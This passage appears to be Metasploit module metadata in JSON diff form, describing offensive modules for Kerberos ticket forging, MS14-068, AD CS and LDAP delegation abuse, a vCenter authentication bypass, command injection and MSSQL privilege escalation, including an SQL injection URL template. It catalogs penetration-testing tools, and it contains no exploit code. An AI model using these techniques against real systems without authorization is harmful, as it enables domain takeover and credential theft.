Delpy", + "Dean Welch", + "alanfoster", + "smashery" + ], + "description": "This module forges a Kerberos ticket. 
Four different techniques can be used:\n - Silver ticket: Using a service account hash, craft a ticket impersonating any user and privileges to that account.\n - Golden ticket: Using the krbtgt hash, craft a ticket impersonating any user and privileges.\n - Diamond ticket: Authenticate to the domain controller, and using the krbtgt hash, copy the PAC from the authenticated user to a forged ticket.\n - Sapphire ticket: Use the S4U2Self+U2U trick to retrieve the PAC of another user, then use the krbtgt hash to craft a forged ticket.", + "references": [ + "URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it" + ], + "platform": "", + "arch": "", + "rport": 88, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-11-28 13:14:13 +0000", + "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/forge_ticket", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [], + "AKA": [ + "Ticketer", + "Klist" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "FORGE_DIAMOND", + "description": "Forge a Diamond Ticket" + }, + { + "name": "FORGE_GOLDEN", + "description": "Forge a Golden Ticket" + }, + { + "name": "FORGE_SAPPHIRE", + "description": "Forge a Sapphire Ticket" + }, + { + "name": "FORGE_SILVER", + "description": "Forge a Silver Ticket" + } + ] + }, + "auxiliary_admin/kerberos/get_ticket": { + "name": "Kerberos TGT/TGS Ticket Requester", + "fullname": "auxiliary/admin/kerberos/get_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Christophe De La Fuente", + "Spencer McIntyre", + "Will Schroeder", + "Lee Christensen", + "Oliver Lyak", + "smashery" + ], + "description": "This module requests TGT/TGS Kerberos 
tickets from the KDC", + "references": [], + "platform": "", + "arch": "", + "rport": 88, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-01-29 14:25:33 +0000", + "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/get_ticket", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "getTGT", + "getST" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "GET_HASH", + "description": "Request a TGS to recover the NTLM hash" + }, + { + "name": "GET_TGS", + "description": "Request a Ticket-Granting-Service (TGS)" + }, + { + "name": "GET_TGT", + "description": "Request a Ticket-Granting-Ticket (TGT)" + } + ] + }, + "auxiliary_admin/kerberos/inspect_ticket": { + "name": "Kerberos Ticket Inspecting", + "fullname": "auxiliary/admin/kerberos/inspect_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Dean Welch" + ], + "description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n decrypts and displays the encrypted content too.\n Can be used for inspecting tickets that aren't working as intended in an effort to debug them.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-01-26 09:21:55 +0000", + "path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/inspect_ticket", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [], + "AKA": [ + "klist" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + 
"auxiliary_admin/kerberos/keytab": { + "name": "Kerberos keytab utilities", + "fullname": "auxiliary/admin/kerberos/keytab", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "alanfoster" + ], + "description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n more principals.\n\n Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n offline.\n\n Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n including the krbtgt encrypted blobs if the AES password hash is used.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-06-13 09:14:06 +0000", + "path": "/modules/auxiliary/admin/kerberos/keytab.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/keytab", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add a new entry to the keytab file" + }, + { + "name": "EXPORT", + "description": "Export the current database creds to the keytab file" + }, + { + "name": "LIST", + "description": "List the entries in the keytab file" + } + ] + }, + "auxiliary_admin/kerberos/ms14_068_kerberos_checksum": { + "name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability", + "fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-18", + "type": "auxiliary", + "author": [ + "Tom Maddock", + "Sylvain Monne", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. 
The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz\n help. It has been tested successfully on Windows 2008.", + "references": [ + "CVE-2014-6324", + "MSB-MS14-068", + "OSVDB-114751", + "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx", + "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/", + "URL-http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek", + "URL-https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit" + ], + "platform": "", + "arch": "", + "rport": 88, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/ms14_068_kerberos_checksum", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/kerberos/ticket_converter": { + "name": "Kerberos ticket converter", + "fullname": "auxiliary/admin/kerberos/ticket_converter", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Zer1t0", + "Dean Welch" + ], + "description": "This module converts tickets to the ccache format from the kirbi format and vice versa.", + "references": [ + "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py", + "URL-https://tools.ietf.org/html/rfc4120", + 
"URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html", + "URL-https://github.com/gentilkiwi/kekeo", + "URL-https://github.com/rvazarkar/KrbCredExport" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-09-28 22:28:54 +0000", + "path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb", + "is_install_path": true, + "ref_name": "admin/kerberos/ticket_converter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/ldap/ad_cs_cert_template": { + "name": "AD CS Certificate Template Management", + "fullname": "auxiliary/admin/ldap/ad_cs_cert_template", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Will Schroeder", + "Lee Christensen", + "Oliver Lyak", + "Spencer McIntyre" + ], + "description": "This module can create, read, update, and delete AD CS certificate templates from a Active Directory Domain\n Controller.\n\n The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be\n restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data\n file to be specified to define the attributes. 
Template data files are provided to create a template that is\n vulnerable to ESC1, ESC2, ESC3 and ESC15.\n\n This module is capable of exploiting ESC4.", + "references": [ + "URL-https://github.com/GhostPack/Certify", + "URL-https://github.com/ly4k/Certipy" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-13 16:46:31 +0000", + "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb", + "is_install_path": true, + "ref_name": "admin/ldap/ad_cs_cert_template", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [], + "AKA": [ + "Certifry", + "Certipy" + ] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "CREATE", + "description": "Create the certificate template" + }, + { + "name": "DELETE", + "description": "Delete the certificate template" + }, + { + "name": "READ", + "description": "Read the certificate template" + }, + { + "name": "UPDATE", + "description": "Modify the certificate template" + } + ] + }, + "auxiliary_admin/ldap/change_password": { + "name": "Change Password", + "fullname": "auxiliary/admin/ldap/change_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "smashery" + ], + "description": "This module allows Active Directory users to change their own passwords, or reset passwords for\n accounts they have privileges over.", + "references": [ + "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py", + "URL-https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/6e803168-f140-4d23-b2d3-c3a8ab5917d2" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-12-06 16:47:25 +0000", + "path": 
"/modules/auxiliary/admin/ldap/change_password.rb", + "is_install_path": true, + "ref_name": "admin/ldap/change_password", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "CHANGE", + "description": "Change the user's password, knowing the existing password" + }, + { + "name": "RESET", + "description": "Reset a target user's password, having permissions over their account" + } + ] + }, + "auxiliary_admin/ldap/rbcd": { + "name": "Role Base Constrained Delegation", + "fullname": "auxiliary/admin/ldap/rbcd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Podalirius", + "Charlie Bromberg", + "Spencer McIntyre" + ], + "description": "This module can read and write the necessary LDAP attributes to configure a particular object for Role Based\n Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account\n specified in DELEGATE_FROM to the object specified in DELEGATE_TO. 
In order for this to succeed, the\n authenticated user must have write access to the target object (the object specified in DELEGATE_TO).", + "references": [ + "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution", + "URL-https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd", + "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-13 16:46:31 +0000", + "path": "/modules/auxiliary/admin/ldap/rbcd.rb", + "is_install_path": true, + "ref_name": "admin/ldap/rbcd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "FLUSH", + "description": "Delete the security descriptor" + }, + { + "name": "READ", + "description": "Read the security descriptor" + }, + { + "name": "REMOVE", + "description": "Remove matching ACEs from the security descriptor DACL" + }, + { + "name": "WRITE", + "description": "Add an ACE to the security descriptor DACL" + } + ] + }, + "auxiliary_admin/ldap/shadow_credentials": { + "name": "Shadow Credentials", + "fullname": "auxiliary/admin/ldap/shadow_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Elad Shamir", + "smashery" + ], + "description": "This module can read and write the necessary LDAP attributes to configure a particular account with a\n Key Credential Link. This allows weaponising write access to a user account by adding a certificate\n that can subsequently be used to authenticate. 
In order for this to succeed, the authenticated user\n must have write access to the target object (the object specified in TARGET_USER).", + "references": [ + "URL-https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", + "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials" + ], + "platform": "", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-05-02 13:57:13 +0000", + "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb", + "is_install_path": true, + "ref_name": "admin/ldap/shadow_credentials", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add a credential to the account" + }, + { + "name": "FLUSH", + "description": "Delete all certificate entries" + }, + { + "name": "LIST", + "description": "Read all credentials associated with the account" + }, + { + "name": "REMOVE", + "description": "Remove matching certificate entries from the account object" + } + ] + }, + "auxiliary_admin/ldap/vmware_vcenter_vmdir_auth_bypass": { + "name": "VMware vCenter Server vmdir Authentication Bypass", + "fullname": "auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-04-09", + "type": "auxiliary", + "author": [ + "Hynek Petrak", + "JJ Lehmann", + "Ofri Ziv", + "wvu " + ], + "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n vmdir service to add an arbitrary administrator user. 
Version 6.7\n prior to the 6.7U3f update is vulnerable, only if upgraded from a\n previous release line, such as 6.0 or 6.5.\n Note that it is also possible to provide a bind username and password\n to authenticate if the target is not vulnerable. It will add an\n arbitrary administrator user the same way.", + "references": [ + "CVE-2020-3952", + "URL-https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/", + "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html", + "URL-https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md" + ], + "platform": "", + "arch": "", + "rport": 636, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-05-02 13:57:13 +0000", + "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "ldap" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "Add", + "description": "Add an admin user" + } + ] + }, + "auxiliary_admin/maxdb/maxdb_cons_exec": { + "name": "SAP MaxDB cons.exe Remote Command Injection", + "fullname": "auxiliary/admin/maxdb/maxdb_cons_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-01-09", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "SAP MaxDB is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", + "references": [ + "OSVDB-40210", + "BID-27206", + "CVE-2008-0244" + ], + "platform": "", + "arch": "", + "rport": 7210, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb", + "is_install_path": true, + "ref_name": "admin/maxdb/maxdb_cons_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/misc/sercomm_dump_config": { + "name": "SerComm Device Configuration Dump", + "fullname": "auxiliary/admin/misc/sercomm_dump_config", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-31", + "type": "auxiliary", + "author": [ + "Eloi Vanderbeken ", + "Matt \"hostess\" Andreko " + ], + "description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.", + "references": [ + "OSVDB-101653", + "URL-https://github.com/elvanderb/TCP-32764" + ], + "platform": "", + "arch": "", + "rport": 32764, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb", + "is_install_path": true, + "ref_name": "admin/misc/sercomm_dump_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/misc/wol": { + "name": "UDP Wake-On-Lan (WOL)", + "fullname": "auxiliary/admin/misc/wol", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sinn3r " + ], + "description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. 
If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-03-05 04:43:37 +0000", + "path": "/modules/auxiliary/admin/misc/wol.rb", + "is_install_path": true, + "ref_name": "admin/misc/wol", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/motorola/wr850g_cred": { + "name": "Motorola WR850G v4.03 Credentials", + "fullname": "auxiliary/admin/motorola/wr850g_cred", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-09-24", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. 
A lot\n more information is available through this request, but\n you can get it all and more after logging in.", + "references": [ + "CVE-2004-1550", + "OSVDB-10232", + "URL-https://seclists.org/bugtraq/2004/Sep/0339.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb", + "is_install_path": true, + "ref_name": "admin/motorola/wr850g_cred", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/ms/ms08_059_his2006": { + "name": "Microsoft Host Integration Server 2006 Command Execution Vulnerability", + "fullname": "auxiliary/admin/ms/ms08_059_his2006", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-14", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.", + "references": [ + "MSB-MS08-059", + "CVE-2008-3466", + "OSVDB-49068", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745" + ], + "platform": "", + "arch": "", + "rport": 0, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb", + "is_install_path": true, + "ref_name": "admin/ms/ms08_059_his2006", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum": { + "name": "Microsoft SQL Server Configuration Enumerator", + "fullname": "auxiliary/admin/mssql/mssql_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Carlos Perez " + ], + "description": 
"This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum_domain_accounts": { + "name": "Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration", + "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind ", + "antti " + ], + "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. 
Enumerated\n accounts can then be used in online dictionary attacks.", + "references": [ + "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum_domain_accounts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum_domain_accounts_sqli": { + "name": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration", + "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind ", + "antti " + ], + "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. 
Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", + "references": [ + "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum_domain_accounts_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum_sql_logins": { + "name": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", + "fullname": "auxiliary/admin/mssql/mssql_enum_sql_logins", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). 
Once logins have been enumerated, they can be used in dictionary attacks.", + "references": [ + "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2023-12-12 09:53:37 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum_sql_logins", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_dbowner": { + "name": "Microsoft SQL Server Escalate Db_Owner", + "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. 
Once\n the user has the sysadmin role the msssql_payload module can be used to obtain\n a shell on the system.", + "references": [ + "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_dbowner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_dbowner_sqli": { + "name": "Microsoft SQL Server SQLi Escalate Db_Owner", + "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must to have the db_owner role in\n a trustworthy database owned by a sysadmin user. 
Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", + "references": [ + "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_dbowner_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_execute_as": { + "name": "Microsoft SQL Server Escalate EXECUTE AS", + "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. 
In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_execute_as", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_execute_as_sqli": { + "name": "Microsoft SQL Server SQLi Escalate Execute AS", + "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. 
